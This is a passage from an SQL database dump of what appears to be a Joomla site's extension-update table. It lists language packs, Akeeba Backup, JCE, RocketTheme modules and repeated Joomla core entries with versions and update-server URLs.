USA','','pkg_en-US','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(31707,57,0,'Estonian','','pkg_et-EE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(31708,57,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(31709,57,0,'Flemish','','pkg_nl-BE','package','',0,'3.10.4.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(31710,57,0,'French','','pkg_fr-FR','package','',0,'3.10.4.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(31711,57,0,'Georgian','','pkg_ka-GE','package','',0,'3.10.4.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(31712,57,0,'German','','pkg_de-DE','package','',0,'3.10.4.2','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(31713,57,0,'German, Austria','','pkg_de-AT','package','',0,'3.10.4.2','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(31714,57,0,'German, Liechtenstein','','pkg_de-LI','package','',0,'3.10.4.2','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(31715,57,0,'German, Luxembourg','','pkg_de-LU','package','',0,'3.10.4.2','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(31716,57,0,'German, Switzerland','','pkg_de-CH','package','',0,'3.10.4.2','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(31717,57,0,'Greek','','pkg_el-GR','package','',0,'3.10.4.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(31718,57,0,'Hungarian','','pkg_hu-HU','package','',0,'3.10.4.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(31719,57,0,'Italian','','pkg_it-IT','package','',0,'3.10.5.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(31720,57,0,'Japanese','','pkg_ja-JP','package','',0,'3.10.4.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(31721,57,0,'Kazakh','','pkg_kk-KZ)','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/kk-KZ)_details.xml','',''),(31722,57,0,'Latvian','','pkg_lv-LV','package','',0,'3.9.25.2','','https://update.joomla.org/language/details3/lv-LV_details.xml','',''),(31723,57,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(31724,57,0,'Norwegian Bokmål','','pkg_nb-NO','package','',0,'3.10.0.1','','https://update.joomla.org/language/details3/nb-NO_details.xml','',''),(31725,57,0,'Persian Farsi','','pkg_fa-IR','package','',0,'3.10.4.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(31726,57,0,'Polish','','pkg_pl-PL','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(31727,57,0,'Portuguese, Brazil','','pkg_pt-BR','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(31728,57,0,'Portuguese, Portugal','','pkg_pt-PT','package','',0,'3.9.29.2','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(31729,57,0,'Romanian','','pkg_ro-RO','package','',0,'3.10.1.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(31730,57,0,'Russian','','pkg_ru-RU','package','',0,'3.10.4.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(31731,57,0,'Serbian, Cyrillic','','pkg_sr-RS','package','',0,'3.10.2.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(31732,57,0,'Serbian, Latin','','pkg_sr-YU','package','',0,'3.10.2.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(31733,57,0,'Slovak','','pkg_sk-SK','package','',0,'3.10.4.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(31734,57,0,'Slovenian','','pkg_sl-SI','package','',0,'3.10.4.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(31735,57,0,'Spanish','','pkg_es-ES','package','',0,'3.10.4.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(31736,57,0,'Spanish, Colombia','','pkg_es-CO','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(31737,57,0,'Swahili','','pkg_sw-KE','package','',0,'3.10.4.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(31738,57,0,'Swedish','','pkg_sv-SE','package','',0,'3.10.4.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(31739,57,0,'Tamil, India','','pkg_ta-IN','package','',0,'3.10.4.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(31740,57,0,'Thai','','pkg_th-TH','package','',0,'3.10.4.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(31741,57,0,'Turkish','','pkg_tr-TR','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/tr-TR_details.xml','',''),(31742,57,0,'Ukrainian','','pkg_uk-UA','package','',0,'3.10.2.1','','https://update.joomla.org/language/details3/uk-UA_details.xml','',''),(31743,57,0,'Uyghur','','pkg_ug-CN','package','',0,'3.7.5.2','','https://update.joomla.org/language/details3/ug-CN_details.xml','',''),(31744,57,0,'Welsh','','pkg_cy-GB','package','',0,'3.10.4.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(31745,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.0.15','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-0-15.html',''),(31746,122,0,'Google Structured Data Free','Google Structured Data Free','gsd','plugin','system',0,'5.0.2','','https://static.tassos.gr/update/gsdfree?type=.xml','\n			https://www.tassos.gr/releases/google-structured-data-markup/google-structured-data-markup-5-0-2			\n		',''),(31747,129,0,'JCE 2.9.18','Installation package for Joomla! 3.x and 4.x','pkg_jce','package','',0,'2.9.18','','https://cdn.joomlacontenteditor.net/updates/xml/editor/pkg_jce.xml','https://www.joomlacontenteditor.net/news/jce-pro-2-9-18-released',''),(31748,130,0,'T3 System Plugin','','t3','plugin','system',0,'3.0.7','','http://update.joomlart.com/service/tracking/j16/plg_system_t3.xml','http://www.joomlart.com/update-steps',''),(31749,135,0,' Phoca Gallery ',' Phoca Gallery is an efficient image gallery extension for Joomla! CMS. ','com_phocagallery','component','',1,'4.4.3','','https://raw.githubusercontent.com/PhocaCz/PhocaGallery/master/manifest.xml','http://www.phoca.cz/version/index.php?phocagallery=4.4.3',''),(31750,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.0.15','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-0-15.html',''),(31751,1,0,'Joomla','','joomla','file','',0,'3.10.5','','https://update.joomla.org/core/extension.xml','',''),(31752,1,0,'Joomla','','joomla','file','',0,'3.10.5','','https://update.joomla.org/core/extension.xml','',''),(31753,1,0,'Joomla','','joomla','file','',0,'3.10.5','','https://update.joomla.org/core/extension.xml','',''),(31754,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.0.15','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-0-15.html',''),(31755,1,0,'Joomla','','joomla','file','',0,'3.10.5','','https://update.joomla.org/core/extension.xml','',''),(31756,1,0,'Joomla','','joomla','file','',0,'3.10.5','','https://update.joomla.org/core/extension.xml','',''),(31757,1,0,'Joomla','','joomla','file','',0,'3.10.5','','https://update.joomla.org/core/extension.xml','',''),(31758,1,0,'Joomla','','joomla','file','',0,'3.10.5','','https://update.joomla.org/core/extension.xml','',''),(31759,1,0,'Joomla','','joomla','file','',0,'3.10.5','','https://update.joomla.org/core/extension.xml','',''),(31760,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.0.15','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-0-15.html',''),(31761,1,0,'Joomla','','joomla','file','',0,'3.10.5','','https://update.joomla.org/core/extension.xml','',''),(31762,1,0,'Joomla','','joomla','file','',0,'3.10.5','','https://update.joomla.org/core/extension.xml','',''),(31763,1,0,'Joomla','','joomla','file','',0,'3.10.5','','https://update.joomla.org/core/extension.xml','',''),(31764,1,0,'Joomla','','joomla','file','',0,'3.10.5','','https://update.joomla.org/core/extension.xml','',''),(31765,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.0.15','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-0-15.html',''),(31766,1,0,'Joomla','','joomla','file','',0,'3.10.5','','https://update.joomla.org/core/extension.xml','',''),(31767,1,0,'Joomla','','joomla','file','',0,'3.10.5','','https://update.joomla.org/core/extension.xml','',''),(31768,1,0,'Joomla','','joomla','file','',0,'3.10.5','','https://update.joomla.org/core/extension.xml','',''),(31769,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.0.15','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-0-15.html',''),(31770,1,0,'Joomla','','joomla','file','',0,'3.10.5','','https://update.joomla.org/core/extension.xml','',''),(31771,1,0,'Joomla','','joomla','file','',0,'3.10.5','','https://update.joomla.org/core/extension.xml','',''),(31772,1,0,'Joomla','','joomla','file','',0,'3.10.5','','https://update.joomla.org/core/extension.xml','',''),(31773,1,0,'Joomla','','joomla','file','',0,'3.10.5','','https://update.joomla.org/core/extension.xml','',''),(31774,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.0.15','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-0-15.html',''),(31775,1,0,'Joomla','','joomla','file','',0,'3.10.5','','https://update.joomla.org/core/extension.xml','',''),(31776,1,0,'Joomla','','joomla','file','',0,'3.10.5','','https://update.joomla.org/core/extension.xml','',''),(31777,1,0,'Joomla','','joomla','file','',0,'3.10.5','','https://update.joomla.org/core/extension.xml','',''),(31778,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.0.15','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-0-15.html',''),(31779,1,0,'Joomla','','joomla','file','',0,'3.10.5','','https://update.joomla.org/core/extension.xml','',''),(31780,1,0,'Joomla','','joomla','file','',0,'3.10.5','','https://update.joomla.org/core/extension.xml','',''),(31781,1,0,'Joomla','','joomla','file','',0,'3.10.5','','https://update.joomla.org/core/extension.xml','',''),(31782,1,0,'Joomla','','joomla','file','',0,'3.10.5','','https://update.joomla.org/core/extension.xml','',''),(31783,1,0,'Joomla','','joomla','file','',0,'3.10.5','','https://update.joomla.org/core/extension.xml','',''),(31784,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.0.15','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-0-15.html',''),(31785,1,0,'Joomla','','joomla','file','',0,'3.10.5','','https://update.joomla.org/core/extension.xml','',''),(31786,1,0,'Joomla','','joomla','file','',0,'3.10.5','','https://update.joomla.org/core/extension.xml','',''),(31787,1,0,'Joomla','','joomla','file','',0,'3.10.5','','https://update.joomla.org/core/extension.xml','',''),(31788,1,0,'Joomla','','joomla','file','',0,'3.10.5','','https://update.joomla.org/core/extension.xml','',''),(31789,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.0.15','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-0-15.html',''),(31790,1,0,'Joomla','','joomla','file','',0,'3.10.5','','https://update.joomla.org/core/extension.xml','',''),(31791,1,0,'Joomla','','joomla','file','',0,'3.10.5','','https://update.joomla.org/core/extension.xml','',''),(31792,1,0,'Joomla','','joomla','file','',0,'3.10.5','','https://update.joomla.org/core/extension.xml','',''),(31793,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.0.15','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-0-15.html',''),(31794,1,0,'Joomla','','joomla','file','',0,'3.10.5','','https://update.joomla.org/core/extension.xml','',''),(31795,1,0,'Joomla','','joomla','file','',0,'3.10.5','','https://update.joomla.org/core/extension.xml','',''),(31796,1,0,'Joomla','','joomla','file','',0,'3.10.5','','https://update.joomla.org/core/extension.xml','',''),(31797,1,0,'Joomla','','joomla','file','',0,'3.10.5','','https://update.joomla.org/core/extension.xml','',''),(31798,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.0.15','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-0-15.html',''),(31799,1,0,'Joomla','','joomla','file','',0,'3.10.5','','https://update.joomla.org/core/extension.xml','',''),(31800,1,0,'Joomla','','joomla','file','',0,'3.10.5','','https://update.joomla.org/core/extension.xml','',''),(31801,1,0,'Joomla','','joomla','file','',0,'3.10.5','','https://update.joomla.org/core/extension.xml','',''),(31802,1,0,'Joomla','','joomla','file','',0,'3.10.5','','https://update.joomla.org/core/extension.xml','',''),(31803,1,0,'Joomla','','joomla','file','',0,'3.10.5','','https://update.joomla.org/core/extension.xml','',''),(31804,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.0.15','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-0-15.html',''),(31805,1,0,'Joomla','','joomla','file','',0,'3.10.5','','https://update.joomla.org/core/extension.xml','',''),(31806,1,0,'Joomla','','joomla','file','',0,'3.10.5','','https://update.joomla.org/core/extension.xml','',''),(31807,3,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(31808,3,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.27.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(31809,3,0,'Basque','','pkg_eu-ES','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/eu-ES_details.xml','',''),(31810,3,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(31811,3,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(31812,3,0,'Chinese, Simplified','','pkg_zh-CN','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(31813,3,0,'Croatian','','pkg_hr-HR','package','',0,'3.10.5.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(31814,3,0,'Czech','','pkg_cs-CZ','package','',0,'3.10.5.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(31815,3,0,'Danish','','pkg_da-DK','package','',0,'3.10.5.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(31816,3,0,'Dari Persian','','pkg_prs-AF','package','',0,'3.4.4.3','','https://update.joomla.org/language/details3/prs-AF_details.xml','',''),(31817,3,0,'Dutch','','pkg_nl-NL','package','',0,'3.10.5.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(31818,3,0,'English, Australia','','pkg_en-AU','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(31819,3,0,'English, Canada','','pkg_en-CA','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(31820,3,0,'English, New Zealand','','pkg_en-NZ','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(31821,3,0,'English, USA','','pkg_en-US','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(31822,3,0,'Estonian','','pkg_et-EE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(31823,3,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(31824,3,0,'Flemish','','pkg_nl-BE','package','',0,'3.10.5.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(31825,3,0,'French','','pkg_fr-FR','package','',0,'3.10.5.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(31826,3,0,'Georgian','','pkg_ka-GE','package','',0,'3.10.5.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(31827,3,0,'German','','pkg_de-DE','package','',0,'3.10.5.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(31828,3,0,'German, Austria','','pkg_de-AT','package','',0,'3.10.5.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(31829,3,0,'German, Liechtenstein','','pkg_de-LI','package','',0,'3.10.5.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(31830,3,0,'German, Luxembourg','','pkg_de-LU','package','',0,'3.10.5.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(31831,3,0,'German, Switzerland','','pkg_de-CH','package','',0,'3.10.5.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(31832,3,0,'Greek','','pkg_el-GR','package','',0,'3.10.5.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(31833,3,0,'Hungarian','','pkg_hu-HU','package','',0,'3.10.4.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(31834,3,0,'Italian','','pkg_it-IT','package','',0,'3.10.5.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(31835,3,0,'Japanese','','pkg_ja-JP','package','',0,'3.10.5.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(31836,3,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(31837,3,0,'Latvian','','pkg_lv-LV','package','',0,'3.9.25.2','','https://update.joomla.org/language/details3/lv-LV_details.xml','',''),(31838,3,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(31839,3,0,'Norwegian Bokmål','','pkg_nb-NO','package','',0,'3.10.0.1','','https://update.joomla.org/language/details3/nb-NO_details.xml','',''),(31840,3,0,'Persian Farsi','','pkg_fa-IR','package','',0,'3.10.5.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(31841,3,0,'Polish','','pkg_pl-PL','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(31842,3,0,'Portuguese, Brazil','','pkg_pt-BR','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(31843,3,0,'Portuguese, Portugal','','pkg_pt-PT','package','',0,'3.9.29.2','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(31844,3,0,'Romanian','','pkg_ro-RO','package','',0,'3.10.5.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(31845,3,0,'Russian','','pkg_ru-RU','package','',0,'3.10.4.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(31846,3,0,'Serbian, Cyrillic','','pkg_sr-RS','package','',0,'3.10.2.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(31847,3,0,'Serbian, Latin','','pkg_sr-YU','package','',0,'3.10.2.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(31848,3,0,'Slovak','','pkg_sk-SK','package','',0,'3.10.5.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(31849,3,0,'Slovenian','','pkg_sl-SI','package','',0,'3.10.5.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(31850,3,0,'Spanish','','pkg_es-ES','package','',0,'3.10.4.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(31851,3,0,'Spanish, Colombia','','pkg_es-CO','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(31852,3,0,'Swahili','','pkg_sw-KE','package','',0,'3.10.5.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(31853,3,0,'Swedish','','pkg_sv-SE','package','',0,'3.10.5.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(31854,3,0,'Tamil, India','','pkg_ta-IN','package','',0,'3.10.5.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(31855,3,0,'Thai','','pkg_th-TH','package','',0,'3.10.5.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(31856,3,0,'Turkish','','pkg_tr-TR','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/tr-TR_details.xml','',''),(31857,3,0,'Ukrainian','','pkg_uk-UA','package','',0,'3.10.2.1','','https://update.joomla.org/language/details3/uk-UA_details.xml','',''),(31858,3,0,'Uyghur','','pkg_ug-CN','package','',0,'3.7.5.2','','https://update.joomla.org/language/details3/ug-CN_details.xml','',''),(31859,3,0,'Welsh','','pkg_cy-GB','package','',0,'3.10.5.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(31860,20,0,'RokSprocket Module','','mod_roksprocket','module','',0,'2.1.28','0802','https://updates.rockettheme.com/joomla/138/b61e70db','',''),(31861,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.9','0802','https://updates.rockettheme.com/joomla/138/2084920890','',''),(31862,20,0,'RokGallery Extension','','mod_rokgallery','module','',0,'2.46','0802','https://updates.rockettheme.com/joomla/286/21ffe006','',''),(31863,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.9','0802','https://updates.rockettheme.com/joomla/286/326466299','',''),(31864,20,0,'RokBooster Plugin','','rokbooster','plugin','system',0,'1.1.19','0802','https://updates.rockettheme.com/joomla/287/cb577720','',''),(31865,20,0,'RokBox Plugin','','rokbox','plugin','system',0,'2.0.16','0802','https://updates.rockettheme.com/joomla/301/dfc993d8','',''),(31866,20,0,'RokCandy Extension','','rokcandy','plugin','system',0,'2.0.4','0802','https://updates.rockettheme.com/joomla/302/2df8a4e2','',''),(31867,20,0,'RokGallery','','','component','',0,'2.46','0802','https://updates.rockettheme.com/joomla/313/1985305838','',''),(31868,20,0,'RokWeather','','','module','',0,'2.0.4','0802','https://updates.rockettheme.com/joomla/313/1307741342','',''),(31869,20,0,'RokMiniEvents','','','module','',0,'3.0.3','0802','https://updates.rockettheme.com/joomla/313/1301311221','',''),(31870,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.9','0802','https://updates.rockettheme.com/joomla/381/337128173','',''),(31871,20,0,'RokCommon','','pkg_rokcommon','package','',0,'3.2.9','0802','https://updates.rockettheme.com/joomla/559/1033ef39','',''),(31872,57,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(31873,57,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.27.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(31874,57,0,'Basque','','pkg_eu-ES','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/eu-ES_details.xml','',''),(31875,57,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(31876,57,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(31877,57,0,'Chinese, Simplified','','pkg_zh-CN','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(31878,57,0,'Croatian','','pkg_hr-HR','package','',0,'3.10.5.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(31879,57,0,'Czech','','pkg_cs-CZ','package','',0,'3.10.5.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(31880,57,0,'Danish','','pkg_da-DK','package','',0,'3.10.5.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(31881,57,0,'Dari Persian','','pkg_prs-AF','package','',0,'3.4.4.3','','https://update.joomla.org/language/details3/prs-AF_details.xml','',''),(31882,57,0,'Dutch','','pkg_nl-NL','package','',0,'3.10.5.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(31883,57,0,'English, Australia','','pkg_en-AU','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(31884,57,0,'English, Canada','','pkg_en-CA','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(31885,57,0,'English, New Zealand','','pkg_en-NZ','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(31886,57,0,'English, USA','','pkg_en-US','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(31887,57,0,'Estonian','','pkg_et-EE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(31888,57,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(31889,57,0,'Flemish','','pkg_nl-BE','package','',0,'3.10.5.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(31890,57,0,'French','','pkg_fr-FR','package','',0,'3.10.5.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(31891,57,0,'Georgian','','pkg_ka-GE','package','',0,'3.10.5.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(31892,57,0,'German','','pkg_de-DE','package','',0,'3.10.5.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(31893,57,0,'German, Austria','','pkg_de-AT','package','',0,'3.10.5.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(31894,57,0,'German, Liechtenstein','','pkg_de-LI','package','',0,'3.10.5.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(31895,57,0,'German, Luxembourg','','pkg_de-LU','package','',0,'3.10.5.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(31896,57,0,'German, Switzerland','','pkg_de-CH','package','',0,'3.10.5.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(31897,57,0,'Greek','','pkg_el-GR','package','',0,'3.10.5.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(31898,57,0,'Hungarian','','pkg_hu-HU','package','',0,'3.10.4.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(31899,57,0,'Italian','','pkg_it-IT','package','',0,'3.10.5.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(31900,57,0,'Japanese','','pkg_ja-JP','package','',0,'3.10.5.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(31901,57,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(31902,57,0,'Latvian','','pkg_lv-LV','package','',0,'3.9.25.2','','https://update.joomla.org/language/details3/lv-LV_details.xml','',''),(31903,57,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(31904,57,0,'Norwegian Bokmål','','pkg_nb-NO','package','',0,'3.10.0.1','','https://update.joomla.org/language/details3/nb-NO_details.xml','',''),(31905,57,0,'Persian Farsi','','pkg_fa-IR','package','',0,'3.10.5.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(31906,57,0,'Polish','','pkg_pl-PL','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(31907,57,0,'Portuguese, Brazil','','pkg_pt-BR','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(31908,57,0,'Portuguese, Portugal','','pkg_pt-PT','package','',0,'3.9.29.2','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(31909,57,0,'Romanian','','pkg_ro-RO','package','',0,'3.10.5.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(31910,57,0,'Russian','','pkg_ru-RU','package','',0,'3.10.4.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(31911,57,0,'Serbian, Cyrillic','','pkg_sr-RS','package','',0,'3.10.2.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(31912,57,0,'Serbian, Latin','','pkg_sr-YU','package','',0,'3.10.2.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(31913,57,0,'Slovak','','pkg_sk-SK','package','',0,'3.10.5.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(31914,57,0,'Slovenian','','pkg_sl-SI','package','',0,'3.10.5.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(31915,57,0,'Spanish','','pkg_es-ES','package','',0,'3.10.4.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(31916,57,0,'Spanish, Colombia','','pkg_es-CO','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(31917,57,0,'Swahili','','pkg_sw-KE','package','',0,'3.10.5.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(31918,57,0,'Swedish','','pkg_sv-SE','package','',0,'3.10.5.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(31919,57,0,'Tamil, 